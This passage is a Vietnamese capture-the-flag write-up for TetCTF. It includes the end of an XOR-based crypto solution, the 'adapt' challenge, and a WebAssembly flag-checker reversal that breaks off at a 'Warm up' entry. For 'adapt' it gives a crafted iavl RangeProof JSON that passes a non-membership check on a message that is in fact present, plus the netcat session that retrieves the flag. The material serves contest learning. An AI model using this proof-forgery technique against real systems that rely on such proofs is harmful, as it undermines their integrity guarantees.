Trường hợp cuối cùng là khả thi nhất để khai thác. Vì key là b'aaaaaaaaaaaaaaaa' và plaintext nhập vào là b'\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa' . Vậy nên những output đó có thể là plaintext ^ key
>>> from pwn import xor
>>> key = b'aaaaaaaaaaaaaaaa'
>>> pt = b'\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa'
>>> xor(pt, key)
b'\xcb\xcb\xcb\xcb\xcb\xcb\xcb\xcb\xcb\xcb\xcb\xcb\xcb\xcb\xcb\xcb'
>>> xor(pt, key).hex()
'cbcbcbcbcbcbcbcbcbcbcbcbcbcbcbcb'

Nhận thấy trường hợp output tại i = 5463 và j = 1 thỏa mãn giả thiết mình đặt ra nên mình thử trên server và ….

adapt
credit: Uyen

Author: ndh

Description: Adaptive chosen-message attack against ECDSA.

Server: nc 139.162.24.230 31337

Material:


Đề cho source main.go như sau:
package main

import (
    "crypto/ecdsa"
    "crypto/elliptic"
    "crypto/rand"
    "crypto/sha256"
    "encoding/base64"
    "encoding/json"
    "fmt"
    "github.com/cosmos/iavl"
    db "github.com/tendermint/tm-db"
    "log"
    "math/big"
    "os"
)

func main() {
    // gen a keypair
    seckey, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
    if err != nil {
        log.Panicf("could not generate ecdsa key: %v", err)
    }
    fmt.Println(seckey.X, seckey.Y)

    // init a mutable tree
    tree, err := iavl.NewMutableTree(db.NewMemDB(), 256, false)
    if err != nil {
        log.Panicf("failed to create a mutable tree: %v", err)
    }

    var msgB64 string
    var msg []byte
    for i := 0; i < 2024; i++ {
        // read message
        if _, err := fmt.Scan(&msgB64); err != nil { // disconnection
            return
        }
        if msgB64 == "." { // enough message-signature pairs
            break
        }
        if msg, err = base64.StdEncoding.DecodeString(msgB64); err != nil { // invalid input
            return
        }

        // mark as seen
        _, err := tree.Set(msg, []byte{})
        if err != nil {
            log.Panicf("tree operation failed: %v", err)
        }

        // send back the signature
        digest := sha256.Sum256(msg)
        r, s, err := ecdsa.Sign(rand.Reader, seckey, digest[:])
        if err != nil {
            log.Panicf("could not sign: %v", err)
        }
        fmt.Println(r, s)
    }

    // To get flag, submit a signature for "Please give me flag" and a proof that the message has not been seen.
    // Note that the proof can be obtained via `tree.GetWithProof`.
    var r, s big.Int
    var proofB64 string
    var proofJson []byte
    var proof iavl.RangeProof
    if _, err := fmt.Scan(&r, &s, &proofB64); err != nil { // disconnection
        return
    }
    if proofJson, err = base64.StdEncoding.DecodeString(proofB64); err != nil { // invalid input
        return
    }
    if err := json.Unmarshal(proofJson, &proof); err != nil { // invalid input
        return
    }

    // verify the signature
    target := []byte("Please give me flag")
    digest := sha256.Sum256(target)
    if !ecdsa.Verify(&seckey.PublicKey, digest[:], &r, &s) { // invalid signature
        return
    }

    // verify the non-membership proof
    root, err := tree.WorkingHash()
    if err != nil {
        log.Panicf("failed to fetch tree root: %v", err)
    }
    if err := proof.Verify(root); err != nil { // invalid proof
        return
    }
    if err := proof.VerifyAbsence(target); err != nil { // invalid proof
        return
    }

    // OK
    flag, err := os.ReadFile("secret/flag.txt")
    if err != nil {
        log.Panicf("could not read flag: %v", err)
    }
    fmt.Println(string(flag))
    log.Println(&r, &s, string(proofJson))
}

Khi kết nối thành công thì server sẽ gửi về ECDSA public key và cho phép user gửi tối đa 1024 message bất kì, server sẽ sign và gửi về signature là một cặp số (r, s) cho tương ứng với message đó. Nếu user biết signature của "Please give me flag" thì server sẽ trả về flag.
Lưu ý là server không cấm user gửi "Please give me flag", và dùng iavl non-membership proof để chứng minh trong số message user đã gửi không có "Please give me flag". Vậy mình sẽ gửi "Please give me flag" để pass cái ecdsa.Verify và tìm cách bypass proof.Verify và proof.VerifyAbsence.
Core của proof.Verify như sau, mục đích của hàm này là calculate roothash từ provided proof và so sánh với roothash ở phía server, RangeProof cho phép verify nhiều leaves trong một proof nhờ đệ quy COMPUTEHASH, should check it.
func (proof *RangeProof) _computeRootHash() (rootHash []byte, treeEnd bool, err error) {
    if len(proof.Leaves) == 0 {
        return nil, false, errors.Wrap(ErrInvalidProof, "no leaves")
    }
    if len(proof.InnerNodes)+1 != len(proof.Leaves) {
        return nil, false, errors.Wrap(ErrInvalidProof, "InnerNodes vs Leaves length mismatch, leaves should be 1 more.") //nolint:revive
    }

    // Start from the left path and prove each leaf.

    // shared across recursive calls
    var leaves = proof.Leaves
    var innersq = proof.InnerNodes
    var COMPUTEHASH func(path PathToLeaf, rightmost bool) (hash []byte, treeEnd bool, done bool, err error)

    // rightmost: is the root a rightmost child of the tree?
    // treeEnd: true iff the last leaf is the last item of the tree.
    // Returns the (possibly intermediate, possibly root) hash.
    COMPUTEHASH = func(path PathToLeaf, rightmost bool) (hash []byte, treeEnd bool, done bool, err error) {

        // Pop next leaf.
        nleaf, rleaves := leaves[0], leaves[1:]
        leaves = rleaves

        // Compute hash.
        hash, err = (pathWithLeaf{
            Path: path,
            Leaf: nleaf,
        }).computeRootHash()

        if err != nil {
            return nil, treeEnd, false, err
        }

        // If we don't have any leaves left, we're done.
        if len(leaves) == 0 {
            rightmost = rightmost && path.isRightmost()
            return hash, rightmost, true, nil
        }

        // Prove along path (until we run out of leaves).
        for len(path) > 0 {

            // Drop the leaf-most (last-most) inner nodes from path
            // until we encounter one with a left hash.
            // We assume that the left side is already verified.
            // rpath: rest of path
            // lpath: last path item
            rpath, lpath := path[:len(path)-1], path[len(path)-1]
            path = rpath
            if len(lpath.Right) == 0 {
                continue
            }

            // Pop next inners, a PathToLeaf (e.g. []ProofInnerNode).
            inners, rinnersq := innersq[0], innersq[1:]
            innersq = rinnersq

            // Recursively verify inners against remaining leaves.
            derivedRoot, treeEnd, done, err := COMPUTEHASH(inners, rightmost && rpath.isRightmost())
            if err != nil {
                return nil, treeEnd, false, errors.Wrap(err, "recursive COMPUTEHASH call")
            }

            if !bytes.Equal(derivedRoot, lpath.Right) {
                return nil, treeEnd, false, errors.Wrapf(ErrInvalidRoot, "intermediate root hash %X doesn't match, got %X", lpath.Right, derivedRoot)
            }

            if done {
                return hash, treeEnd, true, nil
            }
        }

        // We're not done yet (leaves left over). No error, not done either.
        // Technically if rightmost, we know there's an error "left over leaves
        // -- malformed proof", but we return that at the top level, below.
        return hash, false, false, nil
    }

    // Verify!
    path := proof.LeftPath
    rootHash, treeEnd, done, err := COMPUTEHASH(path, true)
    if err != nil {
        return nil, treeEnd, errors.Wrap(err, "root COMPUTEHASH call")
    } else if !done {
        return nil, treeEnd, errors.Wrap(ErrInvalidProof, "left over leaves -- malformed proof")
    }

    // Ok!
    return rootHash, treeEnd, nil
}

Sau khi check root thành công rồi proof.VerifyAbsence sẽ check target key có nằm trong tree không, như code bên dưới. Lưu ý là iavl sắp xếp các leaves theo một thứ tự xác định (tăng dần). Như vậy để prove target key không có trong tree thì:

TH1: key < Leaves[0].Key và Leaves[0].Key là leaf bên trái ngoài cùng

Hoặc, TH2: Leaves[0].Key < key và Leaves[0].Key là leaf bên phải ngoài cùng

Hoặc, TH3: Leaves[0].Key < key và những Leaves[i] khác thoả key < Leaves[i].Key


// Verify that proof is valid absence proof for key.
// Does not assume that the proof itself is valid.
// For that, use Verify(root).
func (proof *RangeProof) VerifyAbsence(key []byte) error {
    if proof == nil {
        return errors.Wrap(ErrInvalidProof, "proof is nil")
    }
    if !proof.rootVerified {
        return errors.New("must call Verify(root) first")
    }
    cmp := bytes.Compare(key, proof.Leaves[0].Key)
    if cmp < 0 {
        if proof.LeftPath.isLeftmost() {
            return nil
        }
        return errors.New("absence not proved by left path")

    } else if cmp == 0 {
        return errors.New("absence disproved via first item #0")
    }
    if len(proof.LeftPath) == 0 {
        return nil
    }
    if proof.LeftPath.isRightmost() {
        return nil
    }

    // See if any of the leaves are greater than key.
    for i := 1; i < len(proof.Leaves); i++ {
        leaf := proof.Leaves[i]
        cmp := bytes.Compare(key, leaf.Key)
        switch {
        case cmp < 0:
            return nil
        case cmp == 0:
            return fmt.Errorf("absence disproved via item #%v", i)
        default:
            // if i == len(proof.Leaves)-1 {
            // If last item, check whether
            // it's the last item in the tree.

            // }
            continue
        }
    }

    // It's still a valid proof if our last leaf is the rightmost child.
    if proof.treeEnd {
        return nil // OK!
    }

    // It's not a valid absence proof.
    if len(proof.Leaves) < 2 {
        return errors.New("absence not proved by right leaf (need another leaf?)")
    }
    return errors.New("absence not proved by right leaf")

}

Giả sử mình build được một tree như hình dưới và có được proof của từng leaf (B), (C), (D) (dùng tree.GetWithProof).

{
    "left_path": [{
        "height": 2,
        "size": 4,
        "version": 1,
        "left": null,
        "right": "ZsAR4E4hOkLqkpI+3Lk1qOcQd8CVQPEAJoMHdXffhV8="
    }, {
        "height": 1,
        "size": 2,
        "version": 1,
        "left": "KxqDTOAA+wMrOxBGM7zRxHDgPOaVSvPyF0vhlGmXvXI=",
        "right": null
    }],
    "inner_nodes": null,
    "leaves": [{
        "key": "506C656173652067697665206D6520666C6166",
        "value": "E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855",
        "version": 1
    }]
}

{
    "left_path": [{
        "height": 2,
        "size": 4,
        "version": 1,
        "left": "iUcZCYGqOynqncfG8RUXccQo3O8mWXYSZVVthc7V3po=",
        "right": null
    }, {
        "height": 1,
        "size": 2,
        "version": 1,
        "left": null,
        "right": "AaLzCR0iVpGoOKYMpJRTw85FKMcgz01LJ9N2TYubO8I="
    }],
    "inner_nodes": null,
    "leaves": [{
        "key": "506C656173652067697665206D6520666C6167",
        "value": "E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855",
        "version": 1
    }]
}

{
    "left_path": [{
        "height": 2,
        "size": 4,
        "version": 1,
        "left": "iUcZCYGqOynqncfG8RUXccQo3O8mWXYSZVVthc7V3po=",
        "right": null
    }, {
        "height": 1,
        "size": 2,
        "version": 1,
        "left": "pvscYKxyFDUPxP0R6qEYaAMYdJC4G2VXKhgJAuAh4So=",
        "right": null
    }],
    "inner_nodes": null,
    "leaves": [{
        "key": "506C656173652067697665206D6520666C6168",
        "value": "E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855",
        "version": 1
    }]
}

Việc còn lại là craft một RangeProof hợp lệ cho hai leaves (B), (D) thoả proof.Verify đồng thời cũng thoả proof.VerifyAbsence theo TH3. Ở đây left_path là path của leaf đầu tiên trong proof: (B), inner_nodes là node (F) (để prove leaf (D) trong tree).
{
    "left_path": [{
        "height": 2,
        "size": 4,
        "version": 1,
        "left": null,
        "right": "ZsAR4E4hOkLqkpI+3Lk1qOcQd8CVQPEAJoMHdXffhV8="
    }, {
        "height": 1,
        "size": 2,
        "version": 1,
        "left": "KxqDTOAA+wMrOxBGM7zRxHDgPOaVSvPyF0vhlGmXvXI=",
        "right": null
    }],
    "inner_nodes": [
        [{
            "height": 1,
            "size": 2,
            "version": 1,
            "left": "pvscYKxyFDUPxP0R6qEYaAMYdJC4G2VXKhgJAuAh4So=",
            "right": null
        }]
    ],
    "leaves": [{
        "key": "506C656173652067697665206D6520666C6166",
        "value": "E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855",
        "version": 1
    }, {
        "key": "506C656173652067697665206D6520666C6168",
        "value": "E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855",
        "version": 1
    }]
}

Xong rồi lấy flag thôi.
% nc 139.162.24.230 31337
56253716365461903439579434265850711409481442763884290297661026675117448458917 51329327614657051210900078708276432162440881597644333974821193751328600339415
UGxlYXNlIGdpdmUgbWUgZmxhZQ==
102086226051766630552792704280250843632675908569658191228801301268745350844965 62296438785217030217012294404635525266252862204816566664977743056729507660424
UGxlYXNlIGdpdmUgbWUgZmxhZg==
82244573064920333839263765403149631407899576805032556451760917404840839054072 48676597670866078956804658634678317277475067664041793228043885120586039346849
UGxlYXNlIGdpdmUgbWUgZmxhZw==
46537078340079849868547597696981012705638642765494322583968235942524680546329 98220644782654064088480205599630519753561646443795431991925613459538716705804
UGxlYXNlIGdpdmUgbWUgZmxhaA==
26924463172195072599691663032962268721216085161071385559744604832313382111263 43280396618361057956315235962661331591263251392719006884668977168111764977253
.
46537078340079849868547597696981012705638642765494322583968235942524680546329
98220644782654064088480205599630519753561646443795431991925613459538716705804
eyJsZWZ0X3BhdGgiOlt7ImhlaWdodCI6Miwic2l6ZSI6NCwidmVyc2lvbiI6MSwibGVmdCI6bnVsbCwicmlnaHQiOiJac0FSNEU0aE9rTHFrcEkrM0xrMXFPY1FkOENWUVBFQUpvTUhkWGZmaFY4PSJ9LHsiaGVpZ2h0IjoxLCJzaXplIjoyLCJ2ZXJzaW9uIjoxLCJsZWZ0IjoiS3hxRFRPQUErd01yT3hCR003elJ4SERnUE9hVlN2UHlGMHZobEdtWHZYST0iLCJyaWdodCI6bnVsbH1dLCJpbm5lcl9ub2RlcyI6W1t7ImhlaWdodCI6MSwic2l6ZSI6MiwidmVyc2lvbiI6MSwibGVmdCI6InB2c2NZS3h5RkRVUHhQMFI2cUVZYUFNWWRKQzRHMlZYS2hnSkF1QWg0U289IiwicmlnaHQiOm51bGx9XV0sImxlYXZlcyI6W3sia2V5IjoiNTA2QzY1NjE3MzY1MjA2NzY5NzY2NTIwNkQ2NTIwNjY2QzYxNjYiLCJ2YWx1ZSI6IkUzQjBDNDQyOThGQzFDMTQ5QUZCRjRDODk5NkZCOTI0MjdBRTQxRTQ2NDlCOTM0Q0E0OTU5OTFCNzg1MkI4NTUiLCJ2ZXJzaW9uIjoxfSx7ImtleSI6IjUwNkM2NTYxNzM2NTIwNjc2OTc2NjUyMDZENjUyMDY2NkM2MTY4IiwidmFsdWUiOiJFM0IwQzQ0Mjk4RkMxQzE0OUFGQkY0Qzg5OTZGQjkyNDI3QUU0MUU0NjQ5QjkzNENBNDk1OTkxQjc4NTJCODU1IiwidmVyc2lvbiI6MX1dfQ==
TetCTF{l34f_c0ns3cut1v3n3ss_n0t_3nf0rc3d}

Reverse Engineering
babyasm
credit: sonx
Bài cho 1 trang web với input để nhập flag, nếu đúng in ra 'Correct!'.
Code xử lý input của trang web như sau:
code = [0, 97, 115, 109, 1, 0, 0, 0, 1, 56, 9, 80, 0, 95, 1, 127, 1, 80, 0, 94, 99, 0, 1, 96, 0, 0, 96, 1, 127, 1, 100, 1, 96, 3, 99, 1, 127, 127, 0, 96, 2, 99, 1, 127, 1, 127, 96, 4, 99, 1, 127, 127, 127, 0, 96, 1, 99, 1, 1, 127, 96, 1, 99, 1, 1, 127, 3, 8, 7, 2, 3, 4, 5, 6, 7, 8, 6, 118, 20, 127, 1, 65, 224, 0, 11, 127, 1, 65, 229, 0, 11, 127, 1, 65, 20, 11, 127, 1, 65, 177, 1, 11, 127, 1, 65, 155, 1, 11, 127, 1, 65, 244, 0, 11, 127, 1, 65, 236, 0, 11, 127, 1, 65, 197, 0, 11, 127, 1, 65, 212, 0, 11, 127, 1, 65, 237, 0, 11, 127, 1, 65, 231, 0, 11, 127, 1, 65, 238, 0, 11, 127, 1, 65, 239, 0, 11, 127, 1, 65, 223, 0, 11, 127, 1, 65, 244, 0, 11, 127, 1, 65, 231, 0, 11, 127, 1, 65, 225, 0, 11, 127, 1, 65, 200, 0, 11, 127, 1, 65, 20, 11, 127, 1, 65, 59, 11, 7, 45, 7, 1, 49, 0, 0, 4, 105, 110, 105, 116, 0, 1, 10, 97, 114, 114, 97, 121, 95, 102, 105, 108, 108, 0, 2, 1, 51, 0, 3, 1, 52, 0, 4, 1, 53, 0, 5, 5, 99, 104, 101, 99, 107, 0, 6, 10, 184, 8, 7, 142, 1, 0, 35, 0, 65, 19, 115, 36, 0, 35, 1, 65, 55, 115, 36, 1, 35, 2, 65, 32, 115, 36, 2, 35, 3, 65, 36, 115, 36, 3, 35, 4, 65, 19, 115, 36, 4, 35, 5, 65, 55, 115, 36, 5, 35, 6, 65, 32, 115, 36, 6, 35, 7, 65, 36, 115, 36, 7, 35, 8, 65, 19, 115, 36, 8, 35, 9, 65, 55, 115, 36, 9, 35, 10, 65, 32, 115, 36, 10, 35, 11, 65, 36, 115, 36, 11, 35, 12, 65, 19, 115, 36, 12, 35, 13, 65, 55, 115, 36, 13, 35, 14, 65, 32, 115, 36, 14, 35, 15, 65, 36, 115, 36, 15, 35, 16, 65, 19, 115, 36, 16, 35, 17, 65, 55, 115, 36, 17, 35, 18, 65, 32, 115, 36, 18, 35, 19, 65, 36, 115, 36, 19, 11, 9, 0, 32, 0, 251, 7, 1, 16, 0, 11, 22, 0, 32, 0, 32, 1, 32, 2, 65, 19, 106, 65, 64, 107, 251, 0, 0, 65, 1, 251, 16, 1, 11, 13, 0, 32, 0, 32, 1, 251, 11, 1, 251, 2, 0, 0, 11, 109, 0, 32, 1, 65, 0, 70, 4, 64, 32, 0, 32, 2, 32, 0, 32, 2, 16, 3, 32, 3, 106, 65, 32, 115, 16, 2, 5, 32, 1, 65, 1, 70, 4, 64, 32, 0, 32, 2, 32, 0, 32, 2, 16, 3, 32, 3, 106, 65, 36, 115, 16, 2, 5, 32, 1, 65, 2, 70, 4, 64, 32, 0, 32, 2, 32, 0, 32, 2, 16, 3, 32, 3, 106, 65, 19, 115, 16, 2, 5, 32, 1, 65, 3, 70, 4, 64, 32, 0, 32, 2, 32, 0, 32, 2, 16, 3, 32, 3, 106, 65, 55, 115, 16, 2, 11, 11, 11, 11, 11, 172, 3, 1, 1, 127, 32, 0, 65, 0, 16, 3, 65, 137, 175, 2, 70, 4, 64, 32, 1, 65, 1, 106, 33, 1, 5, 11, 32, 0, 65, 1, 16, 3, 65, 200, 4, 70, 4, 64, 32, 1, 65, 1, 106, 33, 1, 11, 32, 0, 65, 2, 16, 3, 65, 226, 5, 70, 4, 64, 32, 1, 65, 1, 106, 33, 1, 11, 32, 0, 65, 3, 16, 3, 65, 194, 173, 2, 70, 4, 64, 32, 1, 65, 1, 106, 33, 1, 11, 32, 0, 65, 4, 16, 3, 65, 193, 242, 3, 70, 4, 64, 32, 1, 65, 1, 106, 33, 1, 11, 32, 0, 65, 5, 16, 3, 65, 135, 5, 70, 4, 64, 32, 1, 65, 1, 106, 33, 1, 11, 32, 0, 65, 6, 16, 3, 65, 193, 6, 70, 4, 64, 32, 1, 65, 1, 106, 33, 1, 11, 32, 0, 65, 7, 16, 3, 65, 242, 240, 3, 70, 4, 64, 32, 1, 65, 1, 106, 33, 1, 11, 32, 0, 65, 8, 16, 3, 65, 166, 243, 2, 70, 4, 64, 32, 1, 65, 1, 106, 33, 1, 11, 32, 0, 65, 9, 16, 3, 65, 238, 3, 70, 4, 64, 32, 1, 65, 1, 106, 33, 1, 11, 32, 0, 65, 10, 16, 3, 65, 151, 5, 70, 4, 64, 32, 1, 65, 1, 106, 33, 1, 11, 32, 0, 65, 11, 16, 3, 65, 229, 241, 2, 70, 4, 64, 32, 1, 65, 1, 106, 33, 1, 11, 32, 0, 65, 12, 16, 3, 65, 225, 139, 4, 70, 4, 64, 32, 1, 65, 1, 106, 33, 1, 11, 32, 0, 65, 13, 16, 3, 65, 129, 5, 70, 4, 64, 32, 1, 65, 1, 106, 33, 1, 11, 32, 0, 65, 14, 16, 3, 65, 151, 6, 70, 4, 64, 32, 1, 65, 1, 106, 33, 1, 11, 32, 0, 65, 15, 16, 3, 65, 174, 137, 4, 70, 4, 64, 32, 1, 65, 1, 106, 33, 1, 11, 32, 0, 65, 16, 16, 3, 65, 225, 149, 2, 70, 4, 64, 32, 1, 65, 1, 106, 33, 1, 11, 32, 0, 65, 17, 16, 3, 65, 177, 4, 70, 4, 64, 32, 1, 65, 1, 106, 33, 1, 11, 32, 0, 65, 18, 16, 3, 65, 161, 5, 70, 4, 64, 32, 1, 65, 1, 106, 33, 1, 11, 32, 0, 65, 19, 16, 3, 65, 234, 147, 2, 70, 4, 64, 32, 1, 65, 1, 106, 33, 1, 11, 32, 1, 65, 20, 70, 4, 127, 65, 1, 5, 65, 0, 11, 11, 218, 2, 0, 32, 0, 65, 0, 65, 1, 32, 0, 65, 0, 16, 3, 35, 0, 106, 16, 4, 32, 0, 65, 1, 65, 2, 32, 0, 65, 1, 16, 3, 35, 1, 107, 16, 4, 32, 0, 65, 2, 65, 3, 32, 0, 65, 2, 16, 3, 35, 2, 108, 16, 4, 32, 0, 65, 3, 65, 0, 32, 0, 65, 3, 16, 3, 35, 3, 115, 16, 4, 32, 0, 65, 0, 65, 5, 32, 0, 65, 4, 16, 3, 35, 4, 106, 16, 4, 32, 0, 65, 1, 65, 6, 32, 0, 65, 5, 16, 3, 35, 5, 107, 16, 4, 32, 0, 65, 2, 65, 7, 32, 0, 65, 6, 16, 3, 35, 6, 108, 16, 4, 32, 0, 65, 3, 65, 4, 32, 0, 65, 7, 16, 3, 35, 7, 115, 16, 4, 32, 0, 65, 0, 65, 9, 32, 0, 65, 8, 16, 3, 35, 8, 106, 16, 4, 32, 0, 65, 1, 65, 10, 32, 0, 65, 9, 16, 3, 35, 9, 107, 16, 4, 32, 0, 65, 2, 65, 11, 32, 0, 65, 10, 16, 3, 35, 10, 108, 16, 4, 32, 0, 65, 3, 65, 8, 32, 0, 65, 11, 16, 3, 35, 11, 115, 16, 4, 32, 0, 65, 0, 65, 13, 32, 0, 65, 12, 16, 3, 35, 12, 106, 16, 4, 32, 0, 65, 1, 65, 14, 32, 0, 65, 13, 16, 3, 35, 13, 107, 16, 4, 32, 0, 65, 2, 65, 15, 32, 0, 65, 14, 16, 3, 35, 14, 108, 16, 4, 32, 0, 65, 3, 65, 12, 32, 0, 65, 15, 16, 3, 35, 15, 115, 16, 4, 32, 0, 65, 0, 65, 17, 32, 0, 65, 16, 16, 3, 35, 16, 106, 16, 4, 32, 0, 65, 1, 65, 18, 32, 0, 65, 17, 16, 3, 35, 17, 107, 16, 4, 32, 0, 65, 2, 65, 19, 32, 0, 65, 18, 16, 3, 35, 18, 108, 16, 4, 32, 0, 65, 3, 65, 16, 32, 0, 65, 19, 16, 3, 35, 19, 115, 16, 4, 32, 0, 16, 5, 11, 0, 45, 4, 110, 97, 109, 101, 1, 38, 7, 0, 1, 49, 1, 4, 105, 110, 105, 116, 2, 10, 97, 114, 114, 97, 121, 95, 102, 105, 108, 108, 3, 1, 51, 4, 1, 52, 5, 1, 53, 6, 5, 99, 104, 101, 99, 107];

const byte_code = new Uint8Array(code);

const wasmModule = new WebAssembly.Module(byte_code);
const wasmInstance = new WebAssembly.Instance(wasmModule, {});
const wasm = wasmInstance.exports;

const consoleDiv = document.getElementById('console');
const inputField = document.getElementById('input');

inputField.addEventListener('keydown', function (event) {
    if (event.key === 'Enter') {
        const inputText = inputField.value;
        processInput(inputText);
        inputField.value = '';
    }
});

function processInput(text) {
    const p = document.createElement('p');
    if (text.startsWith('TetCTF{') && text.endsWith('}') && text.length === 27) {

        let array_size = 20;
        let array_obj = wasm.init(array_size);

        for (var i = 0; i < array_size; i++) {
            wasm.array_fill(array_obj, i, text.charCodeAt(i + 7));
        }
        if (wasm.check(array_obj)) {
            p.textContent = '> Correct!';
        } else {
            p.textContent = '> Incorrect!';
        }
    } else {
        p.textContent = '> Incorrect!';
    }
    consoleDiv.appendChild(p);
    consoleDiv.scrollTop = consoleDiv.scrollHeight;
}

Đầu tiên là kiểm tra format của flag, flag phải bắt đầu bằng TetCTF{ và kết thúc bằng } và độ dài của flag phải là 27 ký tự.

Tiếp theo trang web có dùng wasm để xử lý input của người dùng.
Ở đây có thể có tool để decompile wasm, nhưng tôi đọc chay.
Cách đọc cũng không có gì đặc biệt, chỉ là đặt breakpoint, debug dần, xem các giá trị của các biến, stack, hàm được gọi để hiểu được chương trình làm gì.
Tổng quan một số hàm:
init: gọi $1 để khởi tạo các phần tử $global (thể hiện trong mảng global_arr ở đoạn code python bên dưới) bằng cách xor với các giá trị định sẵn (thể hiện trong mảng key).

array_fill: lấy 20 ký tự của flag, từ ký tự thứ 7 đến ký tự thứ 26, cộng với 19 và 64 và lưu vào mảng array_obj.

$3: là hàm tìm giá trị tại vị trí index của mảng array_obj.
$4: là hàm biến đổi array_obj, có sử dụng các phần tử $global. Tổng cộng 4 cách biến đổi khác nhau, tùy thuộc vào giá trị được truyền vào.
$5: so sánh từng phần tử của mảng array_obj với các giá trị đích (thể hiện trong mảng target ở đoạn code python bên dưới).
check: biến đổi mảng array_obj bằng cách gọi hàm $3, $4, cuối cùng là gọi hàm $5 để so sánh kết quả.

Tôi có viết lại đoạn code mô tả lại cách hoạt động của chương trình.
global_arr = [96, 101, 20, 177, 155, 116, 108, 69, 84, 109, 103, 110, 111, 95, 116, 103, 97, 72, 20, 59]

key = [19, 55, 32, 36, 19, 55, 32, 36, 19, 55, 32, 36, 19, 55, 32, 36, 19, 55, 32, 36]

array_obj = [0] * 20

def init():
    for i in range(len(global_arr)):
        global_arr[i] ^= key[i]

def fill_array(input_text):
    for i in range(7, 27):
        array_obj[i - 7] = ord(input_text[i]) + 19 + 64

def process():
    temp = array_obj[0] + global_arr[0]
    temp += array_obj[1]
    temp ^= 32
    temp += (19 + 64)
    array_obj[1] = temp

    temp = array_obj[1] - global_arr[1]
    temp += array_obj[2]
    temp ^= 36
    temp += (19 + 64)
    array_obj[2] = temp

    temp = array_obj[2] * global_arr[2]
    temp += array_obj[3]
    temp ^= 19
    temp += (19 + 64)
    array_obj[3] = temp

    temp = array_obj[3] ^ global_arr[3]
    temp += array_obj[0]
    temp ^= 55
    temp += (19 + 64)
    array_obj[0] = temp

    temp = array_obj[4] + global_arr[4]
    temp += array_obj[5]
    temp ^= 32
    temp += (19 + 64)
    array_obj[5] = temp

    temp = array_obj[5] - global_arr[5]
    temp += array_obj[6]
    temp ^= 36
    temp += (19 + 64)
    array_obj[6] = temp

    temp = array_obj[6] * global_arr[6]
    temp += array_obj[7]
    temp ^= 19
    temp += (19 + 64)
    array_obj[7] = temp

    temp = array_obj[7] ^ global_arr[7]
    temp += array_obj[4]
    temp ^= 55
    temp += (19 + 64)
    array_obj[4] = temp

    temp = array_obj[8] + global_arr[8]
    temp += array_obj[9]
    temp ^= 32
    temp += (19 + 64)
    array_obj[9] = temp

    temp = array_obj[9] - global_arr[9]
    temp += array_obj[10]
    temp ^= 36
    temp += (19 + 64)
    array_obj[10] = temp

    temp = array_obj[10] * global_arr[10]
    temp += array_obj[11]
    temp ^= 19
    temp += (19 + 64)
    array_obj[11] = temp

    temp = array_obj[11] ^ global_arr[11]
    temp += array_obj[8]
    temp ^= 55
    temp += (19 + 64)
    array_obj[8] = temp

    temp = array_obj[12] + global_arr[12]
    temp += array_obj[13]
    temp ^= 32
    temp += (19 + 64)
    array_obj[13] = temp

    temp = array_obj[13] - global_arr[13]
    temp += array_obj[14]
    temp ^= 36
    temp += (19 + 64)
    array_obj[14] = temp

    temp = array_obj[14] * global_arr[14]
    temp += array_obj[15]
    temp ^= 19
    temp += (19 + 64)
    array_obj[15] = temp

    temp = array_obj[15] ^ global_arr[15]
    temp += array_obj[12]
    temp ^= 55
    temp += (19 + 64)
    array_obj[12] = temp

    temp = array_obj[16] + global_arr[16]
    temp += array_obj[17]
    temp ^= 32
    temp += (19 + 64)
    array_obj[17] = temp

    temp = array_obj[17] - global_arr[17]
    temp += array_obj[18]
    temp ^= 36
    temp += (19 + 64)
    array_obj[18] = temp

    temp = array_obj[18] * global_arr[18]
    temp += array_obj[19]
    temp ^= 19
    temp += (19 + 64)
    array_obj[19] = temp

    temp = array_obj[19] ^ global_arr[19]
    temp += array_obj[16]
    temp ^= 55
    temp += (19 + 64)
    array_obj[16] = temp


def check():
    target = [38793, 584, 738, 38594, 63809, 647, 833, 63602, 47526, 494, 663, 47333, 67041, 641, 791, 66734, 35553, 561, 673, 35306]
    for i in range(20):
        if array_obj[i] != target[i]:
            return False
    return True



input_text = input("Enter the flag: ")
if input_text.startswith("TetCTF{") and input_text.endswith("}") and len(input_text) == 27:
    init()
    fill_array(input_text)
    process()
    if check():
        print("Correct!")
    else:
        print("Incorrect!")
else:
    print("Incorrect!")

Tôi nhận ra chương trình nó xử lý từng nhóm 4 phần tử của array_obj. Từng nhóm một, không ảnh hưởng đến nhóm khác.
Do đó lúc giải mã cũng chỉ cần xử lý từng nhóm 4 phần tử của target để tìm ra flag.
flag = ""
target = [38793, 584, 738, 38594, 63809, 647, 833, 63602, 47526, 494, 663, 47333, 67041, 641, 791, 66734, 35553, 561, 673, 35306]

for i in range(0, len(target), 4):
    arr0 = target[i]
    arr1 = target[i + 1]
    arr2 = target[i + 2]
    arr3 = target[i + 3]

    flag2 = ((arr2 - 19 - 64) ^ 36) - (arr1 - global_arr[i + 1]) - 19 - 64
    flag3 = ((arr3 - 19 - 64) ^ 19) - (arr2 * global_arr[i + 2]) - 19 - 64
    flag0 = ((arr0 - 19 - 64) ^ 55) - (arr3 ^ global_arr[i + 3]) - 19 - 64
    flag1 = ((arr1 - 19 - 64) ^ 32) - (flag0 + 19 + 64 + global_arr[i]) - 19 - 64

    try:
        flag += chr(flag0)
        flag += chr(flag1)
        flag += chr(flag2)
        flag += chr(flag3)
    except:
        print("error")
        break

flag = "TetCTF{" + flag + "}"
print(flag)

# TetCTF{WebAss3mblyMystique}

flag: TetCTF{WebAss3mblyMystique}
Warm up
credit: Hansha29
Load file vào Ida, mình nhận thấy rằng bài này có flow khá đơn giản. Ta chỉ nhần nhập vào input là nội dung trong flag, chương trình sẽ kiểm trả đúng tra và trả ra kết quả tương úng cho mình

Hmmm, nhưng với 1 giải có độ khó cao như này thì mình nghĩ là nó không dễ như vậy được, nên là đã tiến hành kiểm tra xem hàm check có gì không
Hàm check:


